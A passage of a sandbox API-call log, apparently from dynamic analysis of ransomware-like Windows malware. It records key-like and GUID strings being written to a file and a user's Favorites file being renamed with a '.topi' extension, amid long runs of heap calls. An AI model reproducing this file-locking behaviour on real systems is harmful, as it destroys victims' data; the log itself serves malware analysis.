hFile=0x6a8, lpBuffer=0x99def60*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x99def60*, lpNumberOfBytesWritten=0x9ccfb50*=0x100, lpOverlapped=0x0) returned 1 [0096.629] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99def60 | out: hHeap=0x680000) returned 1 [0096.629] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316dd88 [0096.629] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x428) returned 0x9a04420 [0096.629] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", cchWideChar=-1, lpMultiByteStr=0x9a04420, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", lpUsedDefaultChar=0x0) returned 41 [0096.629] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x430) returned 0x31d01f0 [0096.629] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a04420 | out: hHeap=0x680000) returned 1 [0096.629] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316dd88 | out: hHeap=0x680000) returned 1 [0096.629] WriteFile (in: hFile=0x6a8, lpBuffer=0x31d01f0*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x31d01f0*, lpNumberOfBytesWritten=0x9ccfb50*=0x28, lpOverlapped=0x0) returned 1 [0096.629] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d01f0 | out: hHeap=0x680000) returned 1 [0096.629] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0096.629] WriteFile (in: hFile=0x6a8, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9ccfb50*=0x26, lpOverlapped=0x0) returned 1 [0096.629] CloseHandle (hObject=0x6a8) returned 1 [0096.630] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa0) returned 0x317ebb8 [0096.630] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8b0) returned 0x31cf750 [0096.630] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x317ebb8 | out: hHeap=0x680000) returned 1 [0096.630] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Spaces.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live\\windows live spaces.url"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Spaces.url.topi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live\\windows live spaces.url.topi")) returned 1 [0096.631] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0096.631] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0096.631] VirtualFree (lpAddress=0x3750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.632] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3152ab8 | out: hHeap=0x680000) returned 1 [0096.632] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d8930c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Windows Live Spaces.url", cAlternateFileName="WINDOW~3.URL")) returned 0 [0096.633] FindClose (in: hFindFile=0x31c7500 | out: hFindFile=0x31c7500) returned 1 [0096.633] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3f40 | out: hHeap=0x680000) returned 1 [0096.633] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e3da8 | out: hHeap=0x680000) returned 1 [0096.633] PeekMessageW (in: lpMsg=0x9ccff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9ccff08) returned 0 [0096.633] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316dd88 [0096.633] PeekMessageW (in: lpMsg=0x9ccfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9ccfb74) returned 0 [0096.633] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316dff8 [0096.633] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0096.633] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0096.633] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316dff8 | out: hHeap=0x680000) returned 1 [0096.633] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316dff8 [0096.633] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0096.633] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0096.633] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316dff8 | out: hHeap=0x680000) returned 1 [0096.633] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316dff8 [0096.633] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0096.633] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0096.633] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316dff8 | out: hHeap=0x680000) returned 1 [0096.633] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316dff8 [0096.633] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0096.633] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0096.633] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316dff8 | out: hHeap=0x680000) returned 1 [0096.634] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316dff8 [0096.634] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0096.634] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0096.634] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316dff8 | out: hHeap=0x680000) returned 1 [0096.634] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316dff8 [0096.634] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99c9c68 [0096.634] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0096.634] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316dff8 | out: hHeap=0x680000) returned 1 [0096.634] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316dff8 [0096.634] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0096.634] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc2e) returned 0x99f25a8 [0096.634] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0096.634] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f25a8 | out: hHeap=0x680000) returned 1 [0096.634] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316dff8 | out: hHeap=0x680000) returned 1 [0096.634] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316dff8 [0096.634] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0096.634] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0096.634] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316dff8 | out: hHeap=0x680000) returned 1 [0096.634] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316dff8 [0096.634] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99c9c68 [0096.634] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0096.634] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316dff8 | out: hHeap=0x680000) returned 1 [0096.634] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316dff8 [0096.634] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0096.634] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0096.634] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316dff8 | out: hHeap=0x680000) returned 1 [0096.634] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316dff8 [0096.634] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0096.635] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0096.635] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316dff8 | out: hHeap=0x680000) returned 1 [0096.635] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316dff8 [0096.635] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0096.635] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0096.635] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316dff8 | out: hHeap=0x680000) returned 1 [0096.635] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316dff8 [0096.635] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0096.635] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0096.635] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316dff8 | out: hHeap=0x680000) returned 1 [0096.635] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316dff8 [0096.635] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99c9c68 [0096.635] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0096.635] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316dff8 | out: hHeap=0x680000) returned 1 [0096.635] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316dff8 [0096.635] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99c9c68 [0096.635] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0096.635] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316dff8 | out: hHeap=0x680000) returned 1 [0096.635] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316dff8 [0096.635] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0096.635] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0096.635] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316dff8 | out: hHeap=0x680000) returned 1 [0096.635] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316dff8 [0096.635] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0096.635] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0096.635] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316dff8 | out: hHeap=0x680000) returned 1 [0096.635] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316dff8 [0096.635] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0096.635] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0096.635] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316dff8 | out: hHeap=0x680000) returned 1 [0096.636] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316dff8 [0096.636] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0096.636] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0096.636] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316dff8 | out: hHeap=0x680000) returned 1 [0096.636] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316dff8 [0096.636] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0096.636] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0096.636] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316dff8 | out: hHeap=0x680000) returned 1 [0096.636] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316dff8 [0096.636] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0096.636] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0096.636] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316dff8 | out: hHeap=0x680000) returned 1 [0096.636] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316dff8 [0096.636] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0096.636] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0096.636] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316dff8 | out: hHeap=0x680000) returned 1 [0096.636] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316dff8 [0096.636] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0096.636] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc46) returned 0x99f25a8 [0096.636] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0096.636] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f25a8 | out: hHeap=0x680000) returned 1 [0096.636] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316dff8 | out: hHeap=0x680000) returned 1 [0096.636] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316dff8 [0096.636] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0096.637] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0096.637] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316dff8 | out: hHeap=0x680000) returned 1 [0096.637] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316dff8 [0096.637] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0096.637] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc2e) returned 0x99f25a8 [0096.637] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0096.637] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f25a8 | out: hHeap=0x680000) returned 1 [0096.637] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316dff8 | out: hHeap=0x680000) returned 1 [0096.637] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316dff8 [0096.637] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0096.637] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0096.637] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316dff8 | out: hHeap=0x680000) returned 1 [0096.637] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316dff8 [0096.637] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0096.637] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0096.637] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316dff8 | out: hHeap=0x680000) returned 1 [0096.637] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316dff8 [0096.637] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0096.637] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0096.637] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316dff8 | out: hHeap=0x680000) returned 1 [0096.637] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316dff8 [0096.637] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0096.637] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0096.637] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316dff8 | out: hHeap=0x680000) returned 1 [0096.637] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316dff8 [0096.638] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0096.638] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc46) returned 0x99f25a8 [0096.638] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0096.638] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f25a8 | out: hHeap=0x680000) returned 1 [0096.638] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316dff8 | out: hHeap=0x680000) returned 1 [0096.638] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316dff8 [0096.638] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99c9c68 [0096.638] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0096.638] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316dff8 | out: hHeap=0x680000) returned 1 [0096.638] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316dff8 [0096.638] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99c9c68 [0096.638] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0096.638] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316dff8 | out: hHeap=0x680000) returned 1 [0096.638] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316dff8 [0096.638] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0096.638] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0096.638] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316dff8 | out: hHeap=0x680000) returned 1 [0096.638] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316dff8 [0096.638] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0096.638] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0096.638] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316dff8 | out: hHeap=0x680000) returned 1 [0096.638] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316dff8 [0096.638] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0096.638] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0096.638] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316dff8 | out: hHeap=0x680000) returned 1 [0096.638] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316dff8 [0096.638] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0096.638] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0096.638] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316dff8 | out: hHeap=0x680000) returned 1 [0096.639] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316dff8 [0096.639] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0096.639] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0096.639] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316dff8 | out: hHeap=0x680000) returned 1 [0096.639] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316dff8 [0096.639] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0096.639] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0096.639] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316dff8 | out: hHeap=0x680000) returned 1 [0096.639] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316dff8 [0096.639] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0096.639] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0096.639] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316dff8 | out: hHeap=0x680000) returned 1 [0096.639] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316dff8 [0096.639] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0096.639] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc46) returned 0x99f25a8 [0096.639] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0096.639] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f25a8 | out: hHeap=0x680000) returned 1 [0096.639] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316dff8 | out: hHeap=0x680000) returned 1 [0096.639] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316dff8 [0096.639] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0096.639] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0096.639] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316dff8 | out: hHeap=0x680000) returned 1 [0096.639] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316dff8 [0096.639] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0096.639] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0096.639] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316dff8 | out: hHeap=0x680000) returned 1 [0096.640] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316dff8 [0096.640] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0096.640] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0096.640] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316dff8 | out: hHeap=0x680000) returned 1 [0096.640] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316dff8 [0096.640] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0096.640] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0096.640] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316dff8 | out: hHeap=0x680000) returned 1 [0096.640] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316dff8 [0096.640] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0096.640] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0096.640] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316dff8 | out: hHeap=0x680000) returned 1 [0096.640] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316dff8 [0096.640] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0096.640] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc46) returned 0x99f25a8 [0096.640] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0096.640] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f25a8 | out: hHeap=0x680000) returned 1 [0096.640] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316dff8 | out: hHeap=0x680000) returned 1 [0096.640] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316dff8 [0096.640] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99c9c68 [0096.640] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0096.640] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316dff8 | out: hHeap=0x680000) returned 1 [0096.640] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316dff8 [0096.640] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99c9c68 [0096.640] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0096.640] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316dff8 | out: hHeap=0x680000) returned 1 [0096.640] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316dff8 [0096.640] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0096.640] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0096.640] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316dff8 | out: hHeap=0x680000) 